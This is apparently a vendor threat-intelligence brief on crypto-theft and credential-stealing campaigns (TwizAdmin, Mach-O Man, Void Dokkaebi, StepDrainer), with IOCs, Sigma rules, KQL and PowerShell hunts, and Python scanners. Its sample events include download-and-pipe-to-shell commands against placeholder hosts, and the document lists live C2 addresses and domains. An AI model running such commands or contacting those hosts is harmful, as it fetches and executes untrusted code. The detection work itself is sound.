Recent OTX pulses indicate a surge in sophisticated, multi-platform credential theft and financial fraud operations. Threat actors including the Lazarus Group, Void Dokkaebi (Famous Chollima), and the Russian-speaking DataBreachPlus collective are actively leveraging diverse initial access vectors—ranging from "ClickFix" social engineering and supply chain repository poisoning to fake job interviews—to deploy information stealers and crypto-drainers. The collective objective is financial theft via cryptocurrency wallet draining (TwizAdmin, StepDrainer) and espionage via browser credential exfiltration (Mach-O Man, BeaverTail). These campaigns demonstrate a high operational maturity, utilizing FastAPI-based C2 panels, malicious VS Code extensions, and typosquatted domains to evade detection.
Threat Actor / Malware Profile
- TwizAdmin (DataBreachPlus): A multi-stage, multi-platform malware (Windows/macOS) featuring a cryptocurrency clipboard hijacker supporting eight chains, BIP-39 seed phrase theft, and a ransomware module (crpx0). It communicates via a FastAPI-based C2 panel observed at 103.241.66[.]238:1337 and uses license key systems. Distribution relies heavily on social engineering lures impersonating logistics (FedEx).
- Mach-O Man (Lazarus Group): A macOS-specific malware kit deployed via ClickFix attacks. The campaign starts with fake meeting invites on Telegram, redirecting users to typosquatted collaboration domains (e.g., livemicrosft.com). It tricks users into executing terminal commands that install the payload, which steals browser data and exfiltrates it via Telegram.
- Void Dokkaebi (Famous Chollima): A North Korea-aligned group evolving into a self-propagating supply chain threat. They use fake job interviews to lure developers into cloning poisoned Git repositories. Malicious VS Code task configurations execute payloads like DEV#POPPER RAT, BeaverTail, and InvisibleFerret, turning the developer's environment into a propagation vector.
- StepDrainer: A Malware-as-a-Service (MaaS) platform targeting over 20 blockchain networks. It focuses on automated asset theft by abusing ERC-20 token permissions and NFT approval mechanisms, often distributed via phishing pages mimicking blockchain explorers.
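The poisoned-repository technique attributed to Void Dokkaebi above relies on a `.vscode/tasks.json` that VS Code runs on folder open. A repository can be checked for that before it is opened. The script below is an added example written for this summary; it is not code from the page, from Security Arsenal, or from the VS Code project. It strips the comments that tasks.json (a JSON-with-comments file) permits, then flags every task that would start automatically (`runOptions.runOn` set to `folderOpen`, a real VS Code task option) or whose command line carries download-and-execute traits. The sample tasks.json, the task labels, the pattern names and the `.invalid` host are constructed for the example.

```python
import json
import re

# Command-line traits worth a second look in a task pulled from an untrusted repository.
# The names and regexes are this example's own, not a VS Code or vendor list.
SUSPICIOUS = {
    "downloader": r"\b(curl|wget)\b",
    "pipe_to_shell": r"\|\s*(ba|z)?sh\b",
    "inline_interpreter": r"\b(node\s+-e|python\d?\s+-c)\b",
    "encoded_content": r"\b(base64|powershell)\b",
}


def strip_jsonc_comments(text):
    """Remove // and /* */ comments that sit outside string literals (tasks.json is JSONC)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escaped characters verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):           # line comment: drop to end of line
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):           # block comment: drop to closing marker
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def task_command_text(task):
    """Flatten command, npm script name and args of one task into a single string."""
    parts = [str(task.get("command", "")), str(task.get("script", ""))]
    parts += [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def analyze_tasks_json(text):
    """Return review findings for every task that auto-runs or looks like a dropper."""
    data = json.loads(strip_jsonc_comments(text))
    findings = []
    for task in data.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = task_command_text(task)
        patterns = [name for name, rx in SUSPICIOUS.items() if re.search(rx, cmd, re.IGNORECASE)]
        if not (auto_run or patterns):
            continue
        severity = "high" if auto_run and patterns else "medium" if patterns else "low"
        findings.append({"label": task.get("label", "<unnamed>"), "auto_run": auto_run,
                         "patterns": patterns, "severity": severity, "command": cmd})
    return findings


# Constructed sample: a benign build task, an auto-run npm task, and an auto-run dropper.
SAMPLE_TASKS_JSON = """{
    // JSONC: comments are legal in tasks.json
    "version": "2.0.0",
    "tasks": [
        {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
        {"label": "watch", "type": "npm", "script": "watch",
         "runOptions": {"runOn": "folderOpen"}},
        {"label": "fetch-deps", "type": "shell",
         "command": "curl -fsSL https://deps.example.invalid/setup.sh | sh",
         "runOptions": {"runOn": "folderOpen"}}
    ]
}"""

if __name__ == "__main__":
    for f in analyze_tasks_json(SAMPLE_TASKS_JSON):
        print(f"[{f['severity']}] {f['label']}: auto_run={f['auto_run']} "
              f"patterns={f['patterns']} cmd={f['command']!r}")
```

Running it reports the `watch` task as low (auto-run, no suspicious command) and `fetch-deps` as high; the plain `build` task is not reported. The comment stripper tracks string state so that the `//` inside `https://` is kept. VS Code itself gates automatic tasks behind Workspace Trust and the `task.allowAutomaticTasks` setting, so the scan is a pre-open review aid rather than a replacement for keeping those controls on.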
IOC Analysis
The provided IOCs span multiple infrastructure types essential for C2 communication and payload delivery:
- Network Infrastructure: Key C2 IPs include 31.31.198.206 (TwizAdmin) and 166.88.4.2 (Void Dokkaebi). Domains feature typosquatting tactics (livemicrosft.com) and dynamic DNS used in crypto drainers (bull-run.fun, scanclaw.live).
- File Artifacts: A significant list of SHA256 and MD5 hashes corresponding to the malware payloads for TwizAdmin, Mach-O Man, and the macOS ClickFix campaigns.
- Operationalization: SOC teams should immediately block the listed domains at the DNS layer and IPs at the firewall. The file hashes must be ingested into EDR solutions for retrospective hunting. The presence of typosquatted domains suggests a need for enhanced DNS security filters capable of detecting visual similarity attacks.
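The visual-similarity filtering the Operationalization point calls for can be prototyped over DNS query logs. The Python below is an added example, not tooling from the page or from Security Arsenal: it normalises common homoglyph substitutions, computes the edit distance between each queried domain's registrable label and a watchlist of brand tokens (microsoft and fedex, chosen because the page cites a livemicrosft.com lookalike and FedEx-themed lures), and flags both near-misses and brand names embedded in unrelated domains. The DNS log lines, the watchlist, the homoglyph table and the public-suffix assumption (the last label is the TLD) are all constructed for the example.

```python
# Watchlist: brand token -> domains that legitimately carry it (constructed for this example).
WATCHED_BRANDS = {
    "microsoft": {"microsoft.com"},
    "fedex": {"fedex.com"},
}

# Character sequences that render alike in many fonts; applied to queried labels and brand tokens.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label):
    """Lower-case a label and collapse homoglyph sequences to their canonical letters."""
    label = label.lower()
    for lookalike, canonical in HOMOGLYPHS:
        label = label.replace(lookalike, canonical)
    return label


def levenshtein(a, b):
    """Classic edit distance: insert, delete and substitute each cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain):
    """Second-level label; assumes a single-label public suffix (no co.uk handling here)."""
    parts = domain.strip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def brand_distance(label, brand):
    """Smallest edit distance between the brand and any window of the label near the brand's length."""
    best = levenshtein(label, brand)
    for width in (len(brand) - 1, len(brand), len(brand) + 1):
        for start in range(max(1, len(label) - width + 1)):
            best = min(best, levenshtein(label[start:start + width], brand))
    return best


def classify_domain(domain):
    """Return (verdict, brand, distance) for one queried domain."""
    dom = domain.strip(".").lower()
    for legit in WATCHED_BRANDS.values():
        if dom in legit or any(dom.endswith("." + d) for d in legit):
            return ("allowed", None, 0)
    label = normalize(registrable_label(dom))
    for brand in WATCHED_BRANDS:
        dist = brand_distance(label, normalize(brand))
        if dist == 0:
            return ("brand_embedded", brand, 0)   # brand string inside an unrelated domain
        if dist == 1:                             # in production, scale this threshold with brand length
            return ("lookalike", brand, 1)
    return ("clean", None, None)


# Constructed DNS query log: timestamp, client IP, queried name.
SAMPLE_DNS_LOG = """\
2026-04-23T10:01:02Z 10.0.0.5 www.microsoft.com
2026-04-23T10:01:09Z 10.0.0.5 livemicrosft.com
2026-04-23T10:02:11Z 10.0.0.7 rnicrosoft-login.net
2026-04-23T10:02:40Z 10.0.0.9 example.org
2026-04-23T10:03:01Z 10.0.0.9 fedex-delivery-notice.com
"""


def scan_dns_log(text):
    """Return (timestamp, client, query, verdict, brand) for every suspicious query."""
    alerts = []
    for line in text.splitlines():
        ts, client, query = line.split()
        verdict, brand, _ = classify_domain(query)
        if verdict in ("lookalike", "brand_embedded"):
            alerts.append((ts, client, query, verdict, brand))
    return alerts


if __name__ == "__main__":
    for alert in scan_dns_log(SAMPLE_DNS_LOG):
        print(*alert)
```

On the sample log the scan flags `livemicrosft.com` as a lookalike (one edit from the brand token), `rnicrosoft-login.net` as brand-embedded once `rn` is collapsed to `m`, and `fedex-delivery-notice.com` as brand-embedded, while `www.microsoft.com` is allowed and `example.org` is clean. A deployable filter would replace the two-entry watchlist with the organisation's own brands and partners, use a proper public-suffix list, and score Unicode confusables as well as ASCII ones.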
Detection Engineering

```yaml
title: Potential TwizAdmin C2 Communication
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects network connections to known TwizAdmin C2 infrastructure IP addresses; the FastAPI C2 panel was observed on 103.241.66.238 port 1337.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/66666666
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: zeek
    service: conn
detection:
    selection_ip:
        id.resp_h:
            - '31.31.198.206'
            - '103.241.66.238'
    # Match on the destination IP only: a bare destination-port condition (1337) would fire on
    # any service using that port and is not specific enough to alert on at this level.
    condition: selection_ip
falsepositives:
    - Legitimate traffic to shared hosting IPs
level: high
```
```yaml
title: Suspicious macOS ClickFix Terminal Execution
id: b2c3d4e5-6789-01bc-def2-2345678901bc
description: Detects potential ClickFix activity where a shell script is downloaded via curl/wget and piped directly to bash/sh.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/77777777
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: macos
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '/bin/bash'
            - '/bin/sh'
            - '/bin/zsh'
    selection_cli:
        CommandLine|contains:
            - 'curl '
            - 'wget '
    selection_pipe:
        CommandLine|contains:
            - ' | '
            - ' |sh'
            - ' |bash'
    condition: all of selection_*
falsepositives:
    - Legitimate developer tools or installation scripts
level: medium
```
```yaml
title: VS Code Task Exploitation via Suspicious Child Process
id: c3d4e5f6-7890-12cd-ef34-3456789012cd
description: Detects exploitation of VS Code tasks where Code.exe spawns a shell or script to execute potential malware payloads.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/88888888
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\Code.exe'
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\pwsh.exe'
            - '\node.exe'
            - '\python.exe'
    selection_cli:
        CommandLine|contains:
            - 'npm'
            - 'python'
            - 'node'
            - 'bash'
    condition: all of selection_*
falsepositives:
    - Legitimate developer build tasks
level: low
```
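To see how the macOS ClickFix rule above behaves on concrete command lines, here is an added Python evaluator; it is my own code, not part of the page, the Sigma project or any Sigma backend. It implements just the subset of Sigma matching these three rules need (`endswith`, `contains` and `re` modifiers, list values as OR, fields within a selection as AND, and `all of X*` / `1 of X*` conditions), runs the ClickFix detection block over constructed process events, and then shows a tightened `selection_pipe` built with Sigma's `re` modifier that drops the `curl ... | jq` false positive while still matching the download-and-pipe pattern. The events and their `.invalid` hosts are constructed.

```python
import re


def _match_value(actual, modifier, expected):
    """One Sigma field comparison. String matching is case-insensitive unless `re` is used."""
    if actual is None:
        return False
    if modifier == "re":
        return re.search(str(expected), str(actual)) is not None
    a, e = str(actual).lower(), str(expected).lower()
    if modifier is None:
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection, event):
    """All fields in a selection must match; a list of values for one field is an OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), modifier or None, v) for v in values):
            return False
    return True


def rule_matches(detection, event):
    """Evaluate a detection block whose condition is 'all of X*' or '1 of X*'."""
    m = re.fullmatch(r"(all|1) of (\w+)\*", detection["condition"].strip())
    if not m:
        raise ValueError("this example only supports 'all of X*' and '1 of X*' conditions")
    quantifier, prefix = m.groups()
    results = [selection_matches(sel, event)
               for name, sel in detection.items()
               if name != "condition" and name.startswith(prefix)]
    return all(results) if quantifier == "all" else any(results)


def evaluate(detection, events):
    return [rule_matches(detection, e) for e in events]


# The detection block of the page's ClickFix rule, transcribed as a dict.
CLICKFIX_DETECTION = {
    "selection_img": {"Image|endswith": ["/bin/bash", "/bin/sh", "/bin/zsh"]},
    "selection_cli": {"CommandLine|contains": ["curl ", "wget "]},
    "selection_pipe": {"CommandLine|contains": [" | ", " |sh", " |bash"]},
    "condition": "all of selection_*",
}

# Same rule, but the pipe must feed sh/bash/zsh rather than any program (this example's tuning).
TIGHTENED_DETECTION = dict(CLICKFIX_DETECTION,
                           selection_pipe={"CommandLine|re": r"\|\s*(ba|z)?sh\b"})

# Constructed process_creation events: ClickFix-style, a benign curl|jq, unrelated, wget|bash.
SAMPLE_EVENTS = [
    {"Image": "/bin/bash",
     "CommandLine": "bash -c 'curl -fsSL https://update.example.invalid/fix.sh | sh'"},
    {"Image": "/bin/zsh",
     "CommandLine": "curl -s https://api.example.invalid/status | jq ."},
    {"Image": "/usr/bin/python3",
     "CommandLine": "python3 -m pip install requests"},
    {"Image": "/bin/sh",
     "CommandLine": "sh -c 'wget -qO- https://cdn.example.invalid/i |bash'"},
]

if __name__ == "__main__":
    for label, det in (("as written", CLICKFIX_DETECTION), ("tightened", TIGHTENED_DETECTION)):
        print(label, evaluate(det, SAMPLE_EVENTS))
```

The rule as written matches events 1, 2 and 4, so the `curl ... | jq` status check is a false positive of the `' | '` string; the tightened variant matches only events 1 and 4. The same evaluator can be pointed at the TwizAdmin and VS Code rules' detection blocks by transcribing them into a dict in the same way.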
```kql
// Hunt for network connections to known C2 infrastructure and typosquatted domains
DeviceNetworkEvents
| where RemoteIP in ("31.31.198.206", "103.241.66.238", "166.88.4.2", "85.239.62.36", "172.94.9.250")
    or RemoteUrl has_any ("fanonlyatn.xyz", "livemicrosft.com", "bull-run.fun", "spot-wave.fun", "moonscan.live")
| extend Timestamp = TimeGenerated, AccountName = InitiatingProcessAccountName, URL = RemoteUrl
| project Timestamp, DeviceName, AccountName, RemoteIP, URL, RemotePort
| order by Timestamp desc
```
```powershell
# PowerShell IOC Hunt Script for TwizAdmin and ClickFix Indicators
# SHA256 and MD5 indicators are kept in separate lists so that each file is compared
# against a digest of the matching algorithm (an MD5 value can never equal a SHA256 digest).
$MaliciousSha256 = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9"
)
$MaliciousMd5 = @(
    "e12285f507c847b986233991b86b22e3"
)

Write-Host "Scanning for known malicious file hashes (this may take time)..." -ForegroundColor Cyan

# Scan the C drive for matching hashes. Hashing every file is slow; narrow -Path for targeted sweeps.
Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 } |
    ForEach-Object {
        try {
            $sha256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
            $md5    = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction Stop).Hash
            # -in compares case-insensitively, so the upper-case digests match the lower-case IOC lists
            if ($sha256 -in $MaliciousSha256 -or $md5 -in $MaliciousMd5) {
                Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
                Write-Host "    SHA256: $sha256" -ForegroundColor DarkRed
                Write-Host "    MD5:    $md5" -ForegroundColor DarkRed
            }
        } catch {
            # Ignore files that cannot be read (locked or access denied)
        }
    }

# Check for active network connections to malicious IPs
$MaliciousIPs = @("31.31.198.206", "103.241.66.238", "166.88.4.2", "172.94.9.250")
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Cyan
Get-NetTCPConnection | Where-Object { $MaliciousIPs -contains $_.RemoteAddress } |
    Select-Object LocalAddress, RemoteAddress, State,
        @{Name = "Process"; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName }}
```
Response Priorities
- Immediate: Block all listed IP addresses and domains at the firewall and proxy levels. Initiate a scan for the provided SHA256 file hashes across all endpoints.
- 24h: Conduct a credential audit and force password resets for accounts associated with the targeted Technology and Finance sectors, particularly for developers and users of cryptocurrency wallets.
- 1 Week: Review and harden CI/CD pipelines against repository poisoning. Implement application control policies to restrict VS Code from spawning unauthorized child processes and educate users on ClickFix social engineering tactics.